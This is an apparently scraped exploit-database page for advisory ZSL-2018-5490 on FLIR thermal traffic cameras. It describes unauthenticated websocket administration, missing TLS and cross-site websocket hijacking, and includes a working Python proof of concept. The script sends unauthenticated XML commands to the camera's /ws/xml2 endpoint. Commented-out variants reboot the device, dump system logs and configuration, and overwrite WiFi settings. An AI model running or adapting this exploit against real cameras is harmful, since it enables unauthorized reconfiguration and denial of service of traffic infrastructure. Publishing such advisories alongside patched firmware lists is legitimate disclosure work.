flir thermal traffic cameras 1.010bb5b27 information disclosure

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flir thermal traffic cameras 1.010bb5b27 information disclosure Code Code...
# Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure # Author: Gjoko 'LiquidWorm' Krstic # Date: 2018-10-06 # Vendor: FLIR Systems, Inc. # Link: # Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455) # Affected firmware version: V1.01-0bb5b27 (TrafiOne) Codename: TrafiOne # E1.00.09 (TI BPL2 EDGE) Codename: TIIP4EDGE # V1.02.P01 (TI x-stream) Codename: TIIP2 # V1.05.P01 (ThermiCam) Codename: ThermiCam # V1.04.P02 (ThermiCam) Codename: ThermiCam # V1.04 (ThermiCam) Codename: ThermiCam # V1.01.P02 (ThermiCam) Codename: ThermiCam # V1.05.P03 (TrafiSense) Codename: TrafiSense # V1.06 (VIP-IP) Codename: VIP-IP # V1.02.P02 (TrafiRadar) Codename: TrafiRadar # # Vendor patched firmware version: # # Product name Firmware Released # ---------------------------------------------------- # ThermiCam / TrafiSense E1.06.03 17.09.2018 # TI BPL2 EDGE V1.00 17.09.2018 # TI x-stream E1.03.02 17.09.2018 # TrafiOne E1.02.02 17.09.2018 # ---------------------------------------------------- # # Advisory ID: ZSL-2018-5490 # Advisory URL: # Vendor firmware updates: # Vendor cyber hardening guide: # Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation # vulnerability utilizing the websocket protocol. The affected FLIR Intelligent # Transportation Systems - ITS models use an insecure implementation of websocket # communication used for administering the device. Authentication and authorization # bypass via referencing a direct object allows an attacker to directly modify running # configurations, disclose information or initiate a denial of service (DoS) scenario # with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for # WebSocket Secure connection making the network traffic disclosed in plain-text to # MitM evil-doers. Also, the web service has an Origin validation security issue and # is vulnerable to Cross-Site WebSocket Hijacking (CSWSH). # # --- # Request: # # GET ws:// HTTP/1.1 # Host: # Connection: Upgrade # Pragma: no-cache # Cache-Control: no-cache # User-Agent: Bond/00.7 # Upgrade: websocket # Origin: # Sec-WebSocket-Version: 13 # Accept-Encoding: gzip, deflate # Accept-Language: en-US,en;q=0.9 # Cookie: tmhDynamicLocale.locale=%22en%22 # Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw== # Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits # # Response: # # HTTP/1.1 101 Switching Protocols # Server: nginx/1.10.2 # Date: Mon, 13 Aug 2018 02:48:46 GMT # Content-Length: 0 # Connection: upgrade # Upgrade: WebSocket # Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk= # # --- # No HTTP/1.1 401 Unauthorized response observed. # #!/usr/bin/env python # -*- coding: utf-8 -*- from websocket import create_connection as t00t import time import sys endpoint = "/ws/xml2" if (len(sys.argv) <= 2): print '[*] Usage: <ipaddress> <port>' exit(0) host = sys.argv[1] port = sys.argv[2] # Supported message types: ''' <Message Type="SupportedMessages"> <Body> <Message Type="GetMessageConstraints"/> <Message Type="GetSupportedMessages"/> <Message Type="Session"/> <Message Type="Subscription"/> <Message Type="ClearData"/> <Message Type="GetConnectionInformation"/> <Message Type="GetData"/> <Message Type="GetEvents"/> <Message Type="GetLostData"/> <Message Type="GetManagedBy"/> <Message Type="GetPresenceData"/> <Message Type="GetPresenceLevel"/> <Message Type="GetPresenceLevelHistory"/> <Message Type="GetStorageLimits"/> <Message Type="SetConnectionSettings"/> <Message Type="SetManagedBy"/> <Message Type="ClearBootCount"/> <Message Type="ClearHistogram"/> <Message Type="ClearStoredCounter"/> <Message Type="ClearSystemLogs"/> <Message Type="CreateAviSequence"/> <Message Type="DoBadStuff"/> <-- ;]] <Message Type="ForceEvent"/> <Message Type="ForceKeyframe"/> <Message Type="GetBootCount"/> <Message Type="GetBplSettings"/> <Message Type="GetCameraConfiguration"/> <Message Type="GetCameraDefinitions"/> <Message Type="GetCameraSettings"/> <Message Type="GetConfiguration"/> <Message Type="GetConstraints"/> <Message Type="GetCpuStatistics"/> <Message Type="GetDateTime"/> <Message Type="GetDisplayOverlay"/> <Message Type="GetEventLog"/> <Message Type="GetEventsDescription"/> <Message Type="GetFrameFlow"/> <Message Type="GetHardwareInformation"/> <Message Type="GetHardwareSensors"/> <Message Type="GetHistogram"/> <Message Type="GetImage"/> <Message Type="GetImageSharpness"/> <Message Type="GetLeptonSettings"/> <Message Type="GetLoggingActivation"/> <Message Type="GetMemoryStatistics"/> <Message Type="GetNumberOfOutputs"/> <Message Type="GetOpenEvents"/> <Message Type="GetOutputsState"/> <Message Type="GetPermissions"/> <Message Type="GetProductInformation"/> <Message Type="GetSocketInformation"/> <Message Type="GetState"/> <Message Type="GetStoredCounter"/> <Message Type="GetSystemLogs"/> <Message Type="GetTemperature"/> <Message Type="GetThermalQualityHistogram"/> <Message Type="GetThermalQualityReferenceImage"/> <Message Type="GetThreadInformation"/> <Message Type="GetTime"/> <Message Type="GetTranslations"/> <Message Type="GetUpTime"/> <Message Type="GetVersion"/> <Message Type="GetVoltage"/> <Message Type="GetWifiInformation"/> <Message Type="KeepAlive"/> <Message Type="Notify"/> <Message Type="PauseDetectionFramework"/> <Message Type="Reboot"/> <Message Type="SetBplSettings"/> <Message Type="SetCameraConfiguration"/> <Message Type="SetCameraSettings"/> <Message Type="SetConfiguration"/> <Message Type="SetConstraintsFilter"/> <Message Type="SetDateTime"/> <Message Type="SetDisplayOverlay"/> <Message Type="SetHardwareInformation"/> <Message Type="SetLeptonSettings"/> <Message Type="SetLoggingActivation"/> <Message Type="SetTime"/> <Message Type="SetWifiInformation"/> <Message Type="UpdateFrameFlow"/> </Body> </Message> ''' socket = t00t("ws://"+host+":"+port+endpoint) #print 'Sending Reboot message type (DoS)...' #msg = '<Message Type=\"Reboot\"></Message>' #print 'Getting supported messages...' #msg = '<Message Type=\"GetSupportedMessages\"></Message>' #print 'Getting system logs...' #msg = '<Message Type=\"GetSystemLogs\"></Message>' #print 'Getting device configuration...' #msg = '<Message Type=\"GetConfiguration\"></Message>' #print 'Setting new Wifi information...' #msg =''' #<Message Type="SetWifiInformation"> # <Body Present="0" SSID="pwned" Channel="11" Hidden="0" Mode="AccessPoint" /> #</Message> #''' msg = '<Message Type=\"GetProductInformation\"></Message>' socket.send(msg) print 'Message sent.' print 'Receiving...' time.sleep(2) priem = socket.recv() print 'Received data: \n%s' % priem socket.close()

Flir thermal traffic cameras 1.010bb5b27 information disclosure Vulnerability / Exploit Source : Flir thermal traffic cameras 1.010bb5b27 information disclosure

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